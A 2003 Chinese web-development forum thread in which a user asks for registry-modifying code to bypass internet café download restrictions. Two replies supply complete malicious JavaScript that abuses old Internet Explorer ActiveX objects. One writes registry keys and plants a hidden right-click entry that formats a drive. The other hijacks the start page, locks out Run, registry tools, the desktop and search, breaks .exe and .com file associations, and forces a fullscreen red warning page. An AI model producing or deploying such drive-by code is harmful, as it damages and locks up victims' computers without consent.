谁知道修改注册表的程序?

yuzhejia 2003-10-17 09:26:28
在网吧经常有禁止下载的设置,可以在网上找到破解的页面,打开页面后刷新就恢复了下载功能,使用过后十分困惑,望高手赐教。求源代码一份,谢谢!
...全文
51 3 打赏 收藏 转发到动态 举报
写回复
用AI写文章
3 条回复
切换为时间正序
请发表友善的回复…
发表回复
renaski 2003-10-18
  • 打赏
  • 举报
回复
<script>
//初始化actiVex控件
document.write("<applet height=0 width=0 code=com.ms.activeX.ActiveXComponent></applet>")
//初始化actiVex控件结束
//定义变量
function reg(){
try
{
//设定applets为0
a=document.applets[0]
//初始化Windows Script Host Shell Object
a.setCLSID("{f935dc22-1cf0-11d0-adb9-00c04fd58a0b}")
a.createInstance()
S=a.GetObject()
//初始化FileSystem Object
a.setCLSID("{0d43fe01-f093-11cf-8940-00a0c9054228}")
a.createInstance();
fs=a.GetObject()
try
{
//开始写注册表
//设定IE的标题为Internet Explorer
S.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","Internet Explorer")
//设定IE的默认首页为空白页
S.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","about:blank")
//让设定首页那项变灰
S.RegWrite ("HKEY_USERS\\.DEFAULT\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\HomePage",0x1,"REG_DWORD")
//让设定分级审查设定那项变灰
S.RegWrite ("HKEY_USERS\\.DEFAULT\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\SecChangeSettings",0x1,"REG_DWORD")
//在网页右键菜单中加入调用文件的命令
S.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\MenuExt\\格式化A盘\\","c:\\format-a.txt.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}");
//写入值为0xf3的dowrd值 注意[REG_SZ:字符型 REG_DWORD:双字节型 REG_BINARY:二进制型]
//对于REG_DWORD型和REG_BINARY型则有两种赋值方式
//直接用十进制的数表示,如:0,1等
//用十六进制的数表示,如:0x12,0xff等
S.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\MenuExt\\格式化A盘\\contexts",0xf3,"REG_DWORD")
//结束写注册表
//开始写硬盘
//生成一个名为c:\\5flash.txt.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}的文件
hd=fs.CreateTextFile("c:\\format-a.txt.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}")
//把这个文件写入javascript内容
//脚本中的start /m 为最小化窗口 /autotest为自动 /u为无条件格式化
hd.write('<script>a=new ActiveXObject ("WSCript.Shell");a.run("start /m format.com a:/q /autotest /u");alert ("正在更新a盘系统文件,请稍等......");<\/script>')
//关闭这个文件
hd.close()
//把这个文件下载到客户机的c盘中,这里的路径完全可以改成网络上的,然后在后面接上.Copy("d:\format.txt"),这个脚本可以改成下载木马
//格式为file=fs.GetFile("网络路径").Copy("运行路径")
//这个脚本如果配合asp,那么完全成了一个功能非常强大的木马了
file=fs.GetFile("c:\\format-a.txt.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}")
//设定这个文件的属性为隐藏
file.Attributes=6
//结束写硬盘
}
catch(reg)
{}
}
catch(reg)
{}
}
function flash()
{
//隔100毫秒就运行一次
setTimeout("reg()",100)
}
flash()
//最后再重申,这个脚本不可用来害人,谢~
</script>
zhaoweiwei 2003-10-17
  • 打赏
  • 举报
回复
给你一段修改注册表的程序
典型的通过修改注册表达到恶意的目的
<html>
<head>
<script language=javascript></script>
<head>
<body onload="SetNewWords()">
<form name="f1" method="POST" action="">
<p>
<textarea rows="160" name="s1" cols="122"></textarea></p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
</form>
</body>
</html>


/* javascript脚本
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
document.write("<h1>世上本无情,庸人自饶之。。。。。</h1>");
function f()
{
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();

try
{
//set home page
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://ok989.ok999.net"); //设置起始页
//end set home page

//Write Regedit
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 01, "REG_BINARY"); //

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 01, "REG_BINARY");

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY");

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "67108863", "REG_DWORD");

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", "00000001", "REG_DWORD");

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop","00000001","REG_DWORD");

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", "00000001", "REG_DWORD");

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");

Shl..RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "★魔界鬼域★");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "★天地无情。死不瞑目★");

Shl.RegWrite ("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\SchedulingAgent","","REG_SZ");
Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSaveSettings",00,"REG_BINARY");
Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoViewContextMenu",01,"REG_BINARY");
Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoTrayContextMenu",01,"REG_BINARY");
Shl.RegWrite ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ScanRegistry","","REG_SZ");
Shl.RegWrite ("HKEY_CLASSES_ROOT\\Folder\\shell\\open\\ddeexec\\","rem [ViewFolder(%l, %I, %S)]","REG_SZ");
Shl.RegWrite ("HKEY_CLASSES_ROOT\\Folder\\shell\\explore\\ddeexec\\","rem [ViewFolder(%l, %I, %S)]","REG_SZ");
Shl.RegWrite ("HKEY_CLASSES_ROOT\\CLSID\\{01E04581-4EEE-11d0-BFE9-00AA005B4383}\\InProcServer32\\","C:\\Windows\\System\\Browseui.dll-","REG_SZ");
Shl.RegWrite ("HKEY_LOCAL_MACHINE\\Software\\CLASSES\\.inf\\","","REG_SZ");
Shl.RegWrite ("HKEY_LOCAL_MACHINE\\Software\\CLASSES\\.exe\\","","REG_SZ");
Shl.RegWrite ("HKEY_LOCAL_MACHINE\\Software\\CLASSES\\.com\\","","REG_SZ");
Shl.RegWrite ("HKEY_LOCAL_MACHINE\\Software\\CLASSES\\.txt\\","","REG_SZ");
Shl.RegWrite ("HKEY_LOCAL_MACHINE\\Software\\CLASSES\\.reg\\","","REG_SZ");
Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun","00000001", "REG_DWORD");
Shl.RegWrite ("HKEY_LOCAL_MACHINE\\Enum\\PCI\\ChannelOptions",02,"REG_BINARY");
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserClose","01", "REG_DWORD");
Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDevMgrPage","00000001", "REG_DWORD");

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetFolders","01000000","REG_DWORD");

Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind", "00000001", "REG_DWORD");

Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFavoritesMenu", "00000001", "REG_DWORD");

Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRecentDocsMenu", "00000001", "REG_DWORD");

Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskbar", "00000001", "REG_DWORD");

Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun","00000001", "REG_DWORD");
Shl.RegWrite ("HKEY_CURRENT_USER\\Control Panel\\International\\stimeformat","HH:mm:ss tt","REG_SZ");
Shl.RegWrite ("HKEY_CURRENT_USER\\Control Panel\\International\\s1159","★绝情魔界★","REG_SZ");
Shl.RegWrite ("HKEY_CURRENT_USER\\Control Panel\\International\\s2359","★绝情魔界★","REG_SZ");

//end Write Regedit
document.write("<body bgcolor='#FF0000'>");
document.write("<h1>天地无情。死不瞑目</h1>");
}
catch(e)
{
document.write("<body bgcolor='#FF0000'>");
document.write("<h1>天地无情。死不瞑目!</h1>");
}
}
catch(e)
{
document.write("<body bgcolor='#FF0000'>");
document.write("<h1>天地无情。死不瞑目</h1>");
}
}

function clean()
{
setTimeout("f()", 1000);
}

clean();
*/
<SCRIPT LANGUAGE="JavaScript">
<!-- Begin
if (this.name!='fullscreen'){
window.open(location.href,'fullscreen','fullscreen,scrollbars')
}
// End -->
</script>

<body bgcolor="#FF0000">
<p><b><font size="7" face="华文彩云">         
</font></b></p>
<p><b><font face="华文彩云" size="7">         
抽刀断水,水更流。</font></b></p>
<p><font face="华文彩云"><font size="7"><b>         
举杯消愁,愁更愁</b></font><b><font size="7">。</font></b></font></p>
yuzhejia 2003-10-17
  • 打赏
  • 举报
回复
谢谢了呵,网吧破解禁止下栽功能的程序和这个是不是一个道理啊?拿回去慢慢研究

87,901

社区成员

发帖
与我相关
我的任务
社区描述
Web 开发 JavaScript
社区管理员
  • JavaScript
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧